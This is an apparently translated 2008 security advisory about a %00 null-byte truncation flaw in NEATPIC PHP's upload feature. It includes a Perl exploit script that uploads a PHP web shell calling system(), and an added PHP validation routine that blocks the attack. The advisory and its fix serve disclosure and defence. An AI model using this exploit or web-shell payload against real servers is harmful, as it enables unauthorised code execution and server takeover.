PHP website alert: filtering vulnerabilities in multiple PHP programs

Wangchao PHP · Author unknown · 2008-05-19

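Impact: arbitrary files can be uploaded directly

Vulnerability description:

When a PHP program accepts a specified PATH, appending %00 to the end of the file name in PATH allows arbitrary files to be uploaded.

Test program: NEATPIC PHP directory direct-read edition 1.2.3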

http://web.cncode.com/SoftView.asp?SoftID=1820

Contributors to this document:

Vulnerability testers: Xiaolu, Lilo, SuperHei, Darkness [All BST Members]

Http://Www.Bugkidz.org

Xiaolu provided an exploit program:

#!/usr/bin/perl
$| = 1;    # autoflush STDOUT
use Socket;

$host = "127.0.0.1";
$port = "80";
$UploadTo = "";

# Multipart body: a "path" field ending in %00, followed by the "image" file part
$str =
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"path\"\r\n".
"\r\n".
"./php.php%00\r\n".
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"image\"; filename=\"F:\\tools\\1.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"<?\r\n".
"system($c);\r\n".
"?>\r\n".
"-----------------------------7d41f4a600472--\r\n".
"\r\n";

print $str;
$len=length($str);
print $len;

# Request headers; Content-Length is the length of the body built above
$req ="POST /index.php?action=upload HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://127.0.0.1/index.php?path=.\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n".
"Host: 127.0.0.1\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie: PHPSESSID=111111111111111111111111\r\n".
"\r\n".
"$str\r\n\r\n";

print $req;
@res = sendraw($req);
print @res;

#Hmm...Maybe you can send it by other way

# Open a TCP connection to $host:$port, send the raw request, return the response lines
sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
        $| = 1;    # autoflush the socket
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}
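
The request above succeeds because the client-supplied path field reaches the file-write call with %00 still in it. A server-side check for that case follows as an added example; it is not part of the original post and is not NEATPIC code. UPLOAD_ROOT, ALLOWED_EXT, safe_upload_target and handle_upload are hypothetical names, the storage root is an assumed value, and the form fields path and image are the ones used in the request shown above.

```php
<?php
// Added example. All names below are hypothetical; the root path is an assumed value.
const UPLOAD_ROOT = '/var/www/app/uploads';
const ALLOWED_EXT = ['gif', 'jpg', 'jpeg', 'png'];

// Returns a safe absolute target path, or null when the request must be rejected.
function safe_upload_target(string $rawPath, string $clientName, string $root = UPLOAD_ROOT): ?string
{
    // Reject a raw NUL byte or a still-encoded %00 in any client-supplied value.
    foreach ([$rawPath, $clientName] as $v) {
        if (strpos($v, "\0") !== false || stripos($v, '%00') !== false) {
            return null;
        }
    }
    // The "path" field may only name an existing directory at or below the root.
    $rootReal = realpath($root);
    $dir = realpath($root . '/' . $rawPath);
    if ($rootReal === false || $dir === false || !is_dir($dir)) return null;
    if ($dir !== $rootReal && strpos($dir, $rootReal . DIRECTORY_SEPARATOR) !== 0) return null;
    // The extension is read from the final name component and must be allowlisted.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) return null;
    // The stored file name is generated by the server, never taken from the client.
    return $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}

function handle_upload(array $post, array $files): bool
{
    $f = $files['image'] ?? null;
    if (!$f || $f['error'] !== UPLOAD_ERR_OK) return false;
    $target = safe_upload_target((string)($post['path'] ?? ''), (string)$f['name']);
    if ($target === null) return false;
    // Check the file content itself instead of the client-declared Content-Type.
    if (@getimagesize($f['tmp_name']) === false) return false;
    return move_uploaded_file($f['tmp_name'], $target);
}
```

With the request shown above, safe_upload_target returns null at the first check because the path value contains %00, so nothing is written.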
